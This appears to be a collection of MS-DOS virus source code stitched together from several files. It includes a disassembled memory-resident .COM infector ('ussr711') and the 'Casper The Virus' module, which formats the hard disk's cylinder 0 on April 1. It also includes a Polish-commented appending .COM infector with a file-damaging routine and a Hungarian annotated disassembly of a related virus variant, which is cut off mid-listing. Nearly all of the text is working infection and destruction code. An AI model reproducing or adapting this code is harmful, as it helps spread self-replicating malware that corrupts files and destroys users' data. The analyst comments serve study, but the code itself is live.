;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_1e equ 20h
|
||||
data_2e equ 22h
|
||||
data_3e equ 4Ch
|
||||
data_4e equ 4Eh
|
||||
data_5e equ 84h
|
||||
data_6e equ 86h
|
||||
data_7e equ 0D9h
|
||||
data_8e equ 0DBh
|
||||
data_9e equ 122h
|
||||
data_10e equ 124h
|
||||
data_11e equ 13Ah
|
||||
data_12e equ 13Ch
|
||||
data_13e equ 441h
|
||||
data_14e equ 3
|
||||
data_15e equ 12h
|
||||
data_16e equ 0
|
||||
data_17e equ 0B0h
|
||||
data_18e equ 0B2h
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
ussr711 proc far
|
||||
|
||||
start:
|
||||
jmp loc_1
|
||||
int 21h ; DOS Services ah=function 00h
|
||||
; terminate, cs=progm seg prefx
|
||||
call sub_1
|
||||
|
||||
ussr711 endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
pop bx
|
||||
xor di,di ; Zero register
|
||||
mov si,bx
|
||||
sub si,3
|
||||
mov ax,4B04h
|
||||
int 21h ; ??INT Non-standard interrupt
|
||||
cmp ax,44Bh
|
||||
loc_1:
|
||||
call sub_2
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_2:
|
||||
pop bx
|
||||
xor di,di ; Zero register
|
||||
mov si,bx
|
||||
sub si,3
|
||||
mov ax,4B04h
|
||||
int 21h ; ??INT Non-standard interrupt
|
||||
cmp ax,44Bh
|
||||
je $+7Dh ; Jump if equal
|
||||
mov ax,es
|
||||
dec ax
|
||||
mov es,ax
|
||||
mov ax,es:data_14e
|
||||
sub ax,2Ch
|
||||
mov es:data_14e,ax
|
||||
sub word ptr es:data_15e,2Ch
|
||||
nop
|
||||
mov es,es:data_15e
|
||||
mov cx,2BBh
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
cli ; Disable interrupts
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
mov cx,ds:data_5e
|
||||
mov es:data_11e,cx
|
||||
mov cx,ds:data_6e
|
||||
mov es:data_12e,cx
|
||||
mov word ptr ds:data_5e,126h
|
||||
mov ds:data_6e,es
|
||||
mov cx,ds:data_1e
|
||||
mov es:data_7e,cx
|
||||
mov cx,ds:data_2e
|
||||
mov es:data_8e,cx
|
||||
mov word ptr ds:data_1e,0B4h
|
||||
mov ds:data_2e,es
|
||||
mov cx,ds:data_3e
|
||||
mov es:data_9e,cx
|
||||
mov cx,ds:data_4e
|
||||
mov es:data_10e,cx
|
||||
mov word ptr ds:data_3e,0DDh
|
||||
mov ds:data_4e,es
|
||||
sti ; Enable interrupts
|
||||
mov di,100h
|
||||
mov si,bx
|
||||
add si,2B3h
|
||||
mov cx,3
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
mov ax,cs
|
||||
mov es,ax
|
||||
mov ds,ax
|
||||
xor ax,ax ; Zero register
|
||||
mov si,ax
|
||||
mov di,0
|
||||
mov bx,offset start
|
||||
jmp bx ; Register jump
|
||||
add bl,[si]
|
||||
db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h
|
||||
db 00h, 40h, 2Eh,0A3h,0B2h, 00h
|
||||
db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h
|
||||
db 00h, 75h, 10h, 2Eh, 81h, 3Eh
|
||||
db 0B2h, 00h, 74h, 37h, 75h, 07h
|
||||
db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h
|
||||
db 00h
|
||||
db 58h,0EAh, 0Ah, 01h, 49h,0D7h
|
||||
db 2Eh, 83h, 3Eh,0B0h, 00h, 00h
|
||||
db 74h, 3Ch, 80h,0FCh, 03h, 74h
|
||||
db 05h, 80h,0FCh, 0Bh
|
||||
db 75h, 32h
|
||||
loc_3:
|
||||
test dl,80h
|
||||
js loc_4 ; Jump if sign=1
|
||||
push ax
|
||||
mov ax,cs:data_18e
|
||||
and ax,3
|
||||
pop ax
|
||||
jnz loc_4 ; Jump if not zero
|
||||
push bp
|
||||
add [bp+si+7Dh],dh
|
||||
push ax
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
mov ax,[bp+6]
|
||||
push ax
|
||||
popf ; Pop flags
|
||||
stc ; Set carry flag
|
||||
pushf ; Push flags
|
||||
pop ax
|
||||
mov [bp+6],ax
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
pop ax
|
||||
mov ah,80h
|
||||
mov ds:data_13e,ah
|
||||
pop ds
|
||||
pop bp
|
||||
iret ; Interrupt return
|
||||
loc_4:
|
||||
;* jmp far ptr loc_20
|
||||
sub_1 endp
|
||||
|
||||
db 0EAh, 49h, 01h, 08h,0D7h
|
||||
cmp ax,4B04h
|
||||
jne loc_5 ; Jump if not equal
|
||||
mov ax,44Bh
|
||||
iret ; Interrupt return
|
||||
loc_5:
|
||||
cmp ax,4B00h
|
||||
je loc_7 ; Jump if equal
|
||||
cmp ax,4B03h
|
||||
je loc_7 ; Jump if equal
|
||||
loc_6:
|
||||
;* jmp far ptr loc_19
|
||||
db 0EAh,0B5h, 02h, 46h,0D5h
|
||||
loc_7:
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
push si
|
||||
push di
|
||||
mov ax,ds
|
||||
mov es,ax
|
||||
cld ; Clear direction
|
||||
mov al,0
|
||||
mov di,dx
|
||||
mov cx,0C8h
|
||||
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
|
||||
jnz loc_8 ; Jump if not zero
|
||||
std ; Set direction flag
|
||||
mov al,2Eh ; '.'
|
||||
mov cx,0Ah
|
||||
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
|
||||
loc_8:
|
||||
jnz loc_11 ; Jump if not zero
|
||||
inc di
|
||||
inc di
|
||||
mov al,[di]
|
||||
and al,0DFh
|
||||
cmp al,43h ; 'C'
|
||||
jne loc_11 ; Jump if not equal
|
||||
mov al,[di+1]
|
||||
and al,0DFh
|
||||
cmp al,4Fh ; 'O'
|
||||
jne loc_11 ; Jump if not equal
|
||||
mov al,[di+2]
|
||||
and al,0DFh
|
||||
cmp al,4Dh ; 'M'
|
||||
jne loc_11 ; Jump if not equal
|
||||
mov al,[di-2]
|
||||
and al,0DFh
|
||||
cmp al,44h ; 'D'
|
||||
jne loc_9 ; Jump if not equal
|
||||
mov al,[di-8]
|
||||
and al,0DFh
|
||||
cmp al,43h ; 'C'
|
||||
je loc_11 ; Jump if equal
|
||||
loc_9:
|
||||
mov ax,4300h
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; get attrb cx, filename @ds:dx
|
||||
mov word ptr cs:[2B4h],cx
|
||||
mov cx,20h
|
||||
mov ax,4301h
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; set attrb cx, filename @ds:dx
|
||||
jc loc_11 ; Jump if carry Set
|
||||
mov word ptr cs:[2B0h],ds
|
||||
mov word ptr cs:[2B2h],dx
|
||||
mov ax,3D02h
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
jc loc_11 ; Jump if carry Set
|
||||
mov bx,ax
|
||||
mov ax,5700h
|
||||
int 21h ; DOS Services ah=function 57h
|
||||
; get file date+time, bx=handle
|
||||
; returns cx=time, dx=time
|
||||
mov word ptr cs:[2ACh],cx
|
||||
mov word ptr cs:[2AEh],dx
|
||||
jmp short loc_12
|
||||
nop
|
||||
loc_10:
|
||||
jmp loc_6
|
||||
loc_11:
|
||||
jmp loc_16
|
||||
loc_12:
|
||||
mov cx,3
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
mov es,ax
|
||||
mov dx,2B6h
|
||||
mov ax,3F00h
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, bx=file handle
|
||||
; cx=bytes to ds:dx buffer
|
||||
mov cx,0
|
||||
mov dx,word ptr cs:[2B7h]
|
||||
add dx,3
|
||||
mov ax,4200h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
mov cx,0Ah
|
||||
mov dx,29Bh
|
||||
mov ax,3F00h
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, bx=file handle
|
||||
; cx=bytes to ds:dx buffer
|
||||
cld ; Clear direction
|
||||
mov cx,0Ah
|
||||
mov si,29Bh
|
||||
mov di,data_16e
|
||||
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
|
||||
jz loc_15 ; Jump if zero
|
||||
mov ax,4202h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,cx
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
cmp ax,6A4h
|
||||
jb loc_15 ; Jump if below
|
||||
jmp short loc_14
|
||||
nop
|
||||
loc_13:
|
||||
jmp short loc_10
|
||||
loc_14:
|
||||
mov cx,cs:data_18e
|
||||
and cx,0Fh
|
||||
add cx,5
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
xor dx,dx ; Zero register
|
||||
mov ax,4000h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file bx=file handle
|
||||
; cx=bytes from ds:dx buffer
|
||||
jc loc_15 ; Jump if carry Set
|
||||
mov ax,4202h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,cx
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
sub ax,3
|
||||
mov word ptr cs:[2AAh],ax
|
||||
xor dx,dx ; Zero register
|
||||
mov ax,4000h
|
||||
mov cx,2BBh
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file bx=file handle
|
||||
; cx=bytes from ds:dx buffer
|
||||
jc loc_15 ; Jump if carry Set
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,cx
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
mov dx,2A9h
|
||||
mov ax,4000h
|
||||
mov cx,3
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file bx=file handle
|
||||
; cx=bytes from ds:dx buffer
|
||||
loc_15:
|
||||
mov ax,5701h
|
||||
mov cx,word ptr cs:[2ACh]
|
||||
mov dx,word ptr cs:[2AEh]
|
||||
int 21h ; DOS Services ah=function 57h
|
||||
; set file date+time, bx=handle
|
||||
; cx=time, dx=time
|
||||
mov ax,3E00h
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
mov ds,word ptr cs:[2B0h]
|
||||
mov dx,word ptr cs:[2B2h]
|
||||
mov cx,word ptr cs:[2B4h]
|
||||
mov ax,4301h
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; set attrb cx, filename @ds:dx
|
||||
loc_16:
|
||||
pop di
|
||||
pop si
|
||||
pop es
|
||||
pop ds
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp short loc_13
|
||||
nop
|
||||
add [bx+si],al
|
||||
push ax
|
||||
mov ah,30h ; '0'
|
||||
int 21h ; DOS Services ah=function 30h
|
||||
; get DOS version number ax
|
||||
cmp ax,1E03h
|
||||
;* je loc_17 ; Jump if equal
|
||||
db 74h, 09h
|
||||
stosb ; Store al to es:[di]
|
||||
stosb ; Store al to es:[di]
|
||||
stosb ; Store al to es:[di]
|
||||
stosb ; Store al to es:[di]
|
||||
;* jmp loc_18
|
||||
db 0E9h, 15h, 00h
|
||||
test ax,3AA5h
|
||||
push ss
|
||||
db 0FEh,0B2h,0B9h, 41h, 20h, 00h
|
||||
db 0B8h, 00h, 4Ch, 02h, 00h
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
|
@ -0,0 +1,33 @@
|
|||
;****************************************************************************
|
||||
;*
|
||||
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
|
||||
;* *
|
||||
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
|
||||
;* *
|
||||
;* DETAILS: Date Activated Hard Disk Destroyer. *
|
||||
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
|
||||
;* *
|
||||
;**************************************************************************
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
mov ah,2ah ; DOS Get Date.
|
||||
int 21h
|
||||
cmp dx,0401h ; 5th May.
|
||||
jne utilend
|
||||
mov ax,0515h ;Format Cylinder, 15 Sectors.
|
||||
mov ch,0 ;Cylinder 0.
|
||||
mov dx,00 ;Head 0, Drive 80h.
|
||||
mov es,dx ;Junk for address marks.
|
||||
mov bx,0 ;Junk....
|
||||
int 13h ;Do It!
|
||||
int 20h ;Exit
|
||||
utilend: jmp entry3
|
||||
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
|
||||
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
|
||||
db "In Fact It Might Just Be Impossible To Recover! "
|
||||
db "How's That Grab Ya! <GRIN>"
|
||||
entry3:
|
||||
|
|
@ -0,0 +1,324 @@
|
|||
; Kod ¦r˘d’owy wirusa nieznanego autorstwa. Widoczne s† silne wp’ywy 648.
|
||||
; Dodano w’asne komentarze wskazuj†ce na r˘§nice mi‘dzy t† wersj† i orygina’em.
|
||||
; Komentarze te poprzedzane s† znakami AK:.
|
||||
; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzežnia 1990.
|
||||
|
||||
comment ;
|
||||
**********************************************************
|
||||
wszystkie adresy w programie sa uzywane jako wzgledne
|
||||
do rejestru si ,nie mozna urzywac adresow bezwzglednych
|
||||
jako offset poniewaz po 'doklejeniu sie do programu
|
||||
moze on byc w roznych miejscach
|
||||
**********************************************************
|
||||
;
|
||||
adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych
|
||||
;w programie wzgledem niego beda
|
||||
;obliczane przesuniecia pol zmiennych
|
||||
start_prg equ 100h ;adres poczatku programu typu .com
|
||||
ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy
|
||||
get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA
|
||||
msdos equ 21h
|
||||
write equ 40h
|
||||
wirus_len equ DTA + 43 - start
|
||||
|
||||
code segment byte public 'code'
|
||||
assume cs:code,ds:code,es:code
|
||||
|
||||
org 100h
|
||||
|
||||
st1: jmp short start
|
||||
|
||||
int msdos
|
||||
|
||||
start: mov dx,offset stare_DTA
|
||||
cld ;ustawienie kierunku przesylania
|
||||
mov si,dx ;poczatek zmiennych programu
|
||||
add si,ofst_rozk ;adres pola rozkazy
|
||||
mov di,100h ;adres pod ktorym jest poczatek programu
|
||||
mov cx,3 ;ilosc bajtow do przeslania
|
||||
repz movsb ;odtworzenie starego poczatku
|
||||
|
||||
mov si,dx ;odtworzenie si
|
||||
|
||||
; AK: pomini‘to badanie wersji DOS
|
||||
|
||||
push es ;zachowanie es bo bedzie zmieniane
|
||||
mov ah,get_dta_addr ;pobierz adres DTA
|
||||
int msdos
|
||||
mov [si],bx ;zapamietanie adresu DTA w polu
|
||||
mov [si+2],es ;stare_DTA
|
||||
pop es ;odtworzenie es
|
||||
|
||||
mov dx,5Fh ;adres pola DTA
|
||||
add dx,si
|
||||
mov ah,1Ah ;ustaw adres DTA ds:dx
|
||||
int msdos
|
||||
|
||||
; AK: zmieniona jest kolejnožŤ instrukcji, teraz do przechowania SI u§yto
|
||||
; DX zamiast stosu
|
||||
|
||||
push es ;zachowanie es
|
||||
push si ;zachowaj si
|
||||
add si,1ah ;adres tekstu PATH=
|
||||
mov dx,si
|
||||
mov es,ds:[2Ch] ;adres srodowiska set
|
||||
|
||||
; AK: w oryginale jest to PUSH SI, POP SI
|
||||
|
||||
mov di,0
|
||||
|
||||
szukaj_dalej:
|
||||
mov si,dx
|
||||
lodsb
|
||||
mov cx,8000h ;dlugosc srodowiska
|
||||
repnz scasb ;szukanie litery P
|
||||
mov cx,4 ;dlugosc reszty ATH=
|
||||
|
||||
porownuj:
|
||||
lodsb
|
||||
scasb
|
||||
jnz szukaj_dalej
|
||||
loop porownuj
|
||||
|
||||
pop si ;odtworz rejestry
|
||||
pop es
|
||||
|
||||
mov [si+16h],di ;adres pierwszego bajtu za PATH=
|
||||
mov di,si
|
||||
add di,1Fh ;adres bufora dla nazwy zbioru
|
||||
mov bx,si
|
||||
jmp short dalej
|
||||
|
||||
nast_sciezka:
|
||||
cmp word ptr[si+16h],0 ;czy koniec path
|
||||
jnz l1 ;nie
|
||||
|
||||
jmp exit1 ;zakoncz nie ma wiecej zbiorow
|
||||
|
||||
l1: push ds
|
||||
push si
|
||||
mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany
|
||||
mov di,si
|
||||
mov si,es:[di+16h]
|
||||
add di,1Fh
|
||||
|
||||
next: lodsb ;zaladuj kolejny znak sciezki dostepu
|
||||
cmp al,';' ;czy koniec definicji scierzki
|
||||
jz koniec_sciezki
|
||||
cmp al,0 ;czy koniec lancucha path
|
||||
jz koniec_set
|
||||
stosb ;przepisz znak do bufora
|
||||
jmp short next
|
||||
|
||||
koniec_set:
|
||||
mov si,0
|
||||
koniec_sciezki:
|
||||
pop bx
|
||||
pop ds
|
||||
mov [bx+16h],si ;adres do ktorego przeszukano path
|
||||
cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \
|
||||
jz dalej
|
||||
mov al,'\'
|
||||
stosb ;dopisz \
|
||||
|
||||
dalej: mov [bx+18h],di
|
||||
mov si,bx
|
||||
add si,10h
|
||||
mov cx,6
|
||||
repz movsb ;przepisanie *.com \0
|
||||
mov si,bx
|
||||
mov ah,4Eh ;find first
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
mov cx,3 ;ukryty tylko do odczytu
|
||||
int msdos
|
||||
jmp short czy_jest
|
||||
|
||||
szuk_nast:
|
||||
mov ah,4Fh ;find next
|
||||
int msdos
|
||||
|
||||
czy_jest:
|
||||
jnc jest
|
||||
|
||||
jmp short nast_sciezka
|
||||
|
||||
jest: mov ax,[si+75h] ;pole zawierajace czas w DTA
|
||||
and al,1Fh ;czy sa 62 sekundy
|
||||
cmp al,1Fh
|
||||
|
||||
jz szuk_nast
|
||||
cmp word ptr [si+79h],0FA00h
|
||||
ja szuk_nast ;jesli zbyt dlugi
|
||||
cmp word ptr [si+79h],10
|
||||
jc szuk_nast
|
||||
|
||||
mov di,[si+18h]
|
||||
push si
|
||||
add si,7Dh
|
||||
kopiuj:
|
||||
lodsb ;kopiuje nazwe zbioru
|
||||
stosb ;nazwa w postaci ASCIIZ
|
||||
cmp al,0 ;czy koniec nazwy
|
||||
jnz kopiuj
|
||||
pop si
|
||||
|
||||
mov ax,4300h ;pobierz atrybuty zbioru
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
mov [si+8],cx ;zapamietanie atrybutow
|
||||
|
||||
mov ax,4301h ;ustaw atrybuty
|
||||
and cx,0FFFEh ;usuwa ewentualne r/o
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
mov ax,3D02h ;otwarcie zbioru
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
jnc l2 ;czy poprawne otwarcie
|
||||
|
||||
jmp exit2
|
||||
|
||||
l2: mov bx,ax
|
||||
mov ax,5700h ;pobierz czas i date powstania zbioru
|
||||
int msdos
|
||||
mov [si+4],cx ;czas
|
||||
mov [si+6],dx ;data
|
||||
|
||||
mov ah,2Ch ;pobierz czas systemowy
|
||||
int msdos
|
||||
|
||||
and dh,7 ;sekundy
|
||||
jnz zostaw
|
||||
|
||||
comment ;
|
||||
**********************************************************
|
||||
tutaj mozna umiescic dowolna procedure uszkadzajaca zbior
|
||||
ta wywolywana jest losowo jesli ostatnie trzy bity sekund
|
||||
zegara systemu sa rowne zero np. 8,16,24 itd.
|
||||
**********************************************************
|
||||
;
|
||||
mov ah,write ;zapis do zbioru
|
||||
mov cx,5 ;pieciu bajtow lezacych
|
||||
mov dx,si ;juz poza programem czyli
|
||||
add dx,8Ah ;faktycznie dowolnych
|
||||
int msdos
|
||||
jmp exit3
|
||||
|
||||
;*********************************************************
|
||||
;koniec procedury uszkadzajacej zbior
|
||||
;*********************************************************
|
||||
|
||||
zostaw: mov ah,3Fh ;odczyt trzech pierwszych
|
||||
mov cx,3 ;bajtow z pliku
|
||||
mov dx,ofst_rozk ;do pola rozkazy
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli byl blad czytania
|
||||
|
||||
cmp ax,3 ;czy odczytano dokladnie
|
||||
jnz exit3 ;trzy bajty
|
||||
|
||||
mov ax,4202h ;przewiniecie zbioru na koniec
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli blad
|
||||
|
||||
mov cx,ax ;w ax dlugosc zbioru
|
||||
sub ax,3
|
||||
;obiczanie przesuniecia dla skoku do poczatku wirusa
|
||||
;jest to adres konca zbioru minus 3 poniewaz
|
||||
;jmp jest trzy bajtowy
|
||||
|
||||
mov [si+0Eh],ax ;zapis adresu w polu skok
|
||||
|
||||
add cx,adr_baz - start + start_prg
|
||||
;obliczanie adresu poczatku danych (tego ktory jest w si)
|
||||
;jest to adres pola stare_DTA + 100h przesuniecia programu
|
||||
|
||||
mov di,si
|
||||
sub di,adr_baz - start - 1
|
||||
mov [di],cx ;zapisanie adresu bezposrednio w pole
|
||||
;w pole rozkazu mov dx,offset
|
||||
|
||||
mov ah,write ;dopisanie wirusa na koniec
|
||||
mov cx,wirus_len ;dlugosc wirusa
|
||||
mov dx,si
|
||||
sub dx,adr_baz - start ;obliczenie adresu poczatku wirusa
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli blad
|
||||
cmp ax,wirus_len ;czy zapisano calego wirusa
|
||||
jnz exit3
|
||||
|
||||
mov ax,4200h ;przewiniecie zbioru na poczatek
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli blad
|
||||
|
||||
mov ah,write ;zapis jmp do wirusa
|
||||
mov cx,3 ;na poczatku
|
||||
mov dx,si
|
||||
add dx,0Dh ;pole skok
|
||||
int msdos
|
||||
|
||||
exit1: mov dx,[si+6] ;data
|
||||
mov cx,[si+4] ;czas
|
||||
or cx,1Fh ;zaznaczenie ze zbior jest zarazony
|
||||
;ilosc sekund = 62
|
||||
|
||||
mov ax,5701h ;zapis daty i czasu do zbioru
|
||||
int msdos
|
||||
|
||||
mov ah,3Eh ;zamkniecie zbioru
|
||||
int msdos
|
||||
|
||||
exit2: mov ax,4301h ;ustawienie atrybutow
|
||||
mov cx,[si+8] ;stare atrybuty
|
||||
mov dx,001Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
exit3: push ds
|
||||
mov ah,1Ah ;ustaw adres DTA
|
||||
mov dx,[si+0] ;pole stare_DTA
|
||||
mov ds,es:[si+2]
|
||||
int msdos
|
||||
|
||||
pop ds
|
||||
|
||||
xor ax,ax ;zerowanie rejestrow
|
||||
xor bx,bx
|
||||
xor dx,dx
|
||||
xor si,si
|
||||
mov di,0100h ;na stos adres startu
|
||||
push di
|
||||
xor di,di
|
||||
ret
|
||||
|
||||
stare_DTA dd 0
|
||||
czas_zb dw 0
|
||||
data_zb dw 0
|
||||
attr_zb dw 0
|
||||
rozkazy db 0b4h,4ch,0cdh
|
||||
skok db 0e9h,0,0 ;kod rozkazu jmp
|
||||
zbior db '*.com',0
|
||||
srodow dw 0 ;adres srodowiska set
|
||||
bufor dw 0 ;wskaznik do nazwy zbioru
|
||||
path db 'PATH='
|
||||
nazwa_zb db 63 dup(0) ;pole na nazwe zbioru
|
||||
DTA db 43 dup(0) ;pole dta
|
||||
|
||||
code ends
|
||||
end st1
|
||||
|
|
@ -0,0 +1,669 @@
|
|||
|
||||
|
||||
A Resetel” vˇrus T”lt”get” f‚le mut nsa
|
||||
***************************************
|
||||
|
||||
|
||||
A Resetel” vˇrussal teljes eg‚sz‚ben megegyezik a fert”z” mechanizmus.
|
||||
Eltekintve att˘l, hogy ez a mut ns nem tesz t”nkre f jlokat. Az adatter<EFBFBD>let is
|
||||
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetel”t. A v ltoz s:
|
||||
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
|
||||
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik T”lt”get”vel fert”z”tt, akkor
|
||||
elindˇtja a T”lt”get”t !
|
||||
|
||||
|
||||
;Ide (0100-ra) mutat a file elej‚r”l az ugr˘ utasˇt s.
|
||||
|
||||
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
|
||||
|
||||
0100 51 PUSH CX ;CX a stacken marad mindv‚gig.
|
||||
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
|
||||
;fert”z‚skor llˇtja be , ˇgy mindig a helyes cˇmre mutat.
|
||||
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
|
||||
0104 FC CLD ;( ERE_DTA_OFS)
|
||||
0105 8BF2 MOV SI,DX
|
||||
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
|
||||
010B BF0001 MOV DI,0100 ;Program eleje
|
||||
010E B90300 MOV CX,0003 ;3 byte
|
||||
0111 F3 REPZ
|
||||
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Install ci˘s r‚sz:
|
||||
;-----------------------------------------
|
||||
|
||||
;DOS verzi˘ lek‚rdez‚se. 1.00-n l kisebb verzi˘n l az eredeti
|
||||
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
|
||||
|
||||
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
|
||||
0115 B430 MOV AH,30
|
||||
0117 CD21 INT 21 ;DOS verzi˘ lek‚rdez‚se
|
||||
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbn‚l l‚p ki
|
||||
011B 7503 JNZ 0120
|
||||
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
|
||||
|
||||
|
||||
;Disk Transzfer Address lek‚rdez‚se, elment‚se
|
||||
|
||||
0120 06 PUSH ES
|
||||
0121 B42F MOV AH,2F
|
||||
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rz‚se
|
||||
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
|
||||
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
|
||||
|
||||
;-------------------------------------------------------
|
||||
; A beiktatott behŁz˘ r‚sz
|
||||
;-------------------------------------------------------
|
||||
|
||||
012D E85802 CALL 0388
|
||||
0130 07 POP ES
|
||||
|
||||
;DTA be llˇt sa ENTRY cˇm‚re (0358). Igy a FindFirst, FindNext
|
||||
;DOS funkci˘k ide fogj k m solni a file adatait (nev‚t,idej‚t,
|
||||
;hossz t,stb).
|
||||
|
||||
0131 BA5F00 MOV DX,005F
|
||||
;{Val˘szˇn<CB87>leg r‚gi assemblerrel ˇrt k a vˇrust, ez‚rt van itt
|
||||
;egy NOP utasˇt s.}
|
||||
0134 90 NOP
|
||||
0135 03D6 ADD DX,SI
|
||||
0137 B41A MOV AH,1A
|
||||
0139 CD21 INT 21 ;DTA llˇt sa DS:DX-re: ENTRY(0358)
|
||||
|
||||
|
||||
;A PATH-ok cˇm‚nek megkeres‚se. Ha az aktu lis k”nyvt rban m r
|
||||
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
|
||||
;k”nyvt raknak a nev‚t , amelyekben m‚g megfert”zend” fileokat
|
||||
;tal lhat.
|
||||
|
||||
013B 06 PUSH ES
|
||||
013C 56 PUSH SI
|
||||
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
|
||||
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
|
||||
;(a k”vetkez” directoryra) mutatni
|
||||
|
||||
|
||||
;A k”vetkez” r‚sz a PATH= sz”veget keresi meg az environment
|
||||
;ter<65>leten:
|
||||
|
||||
0144 5E POP SI
|
||||
0145 56 PUSH SI
|
||||
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
|
||||
014A AC LODSB ;AL=DS:[SI],SI++
|
||||
014B B90080 MOV CX,8000 ;max 32k az environment
|
||||
014E F2 REPNZ
|
||||
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
|
||||
;'P' bet<65>t
|
||||
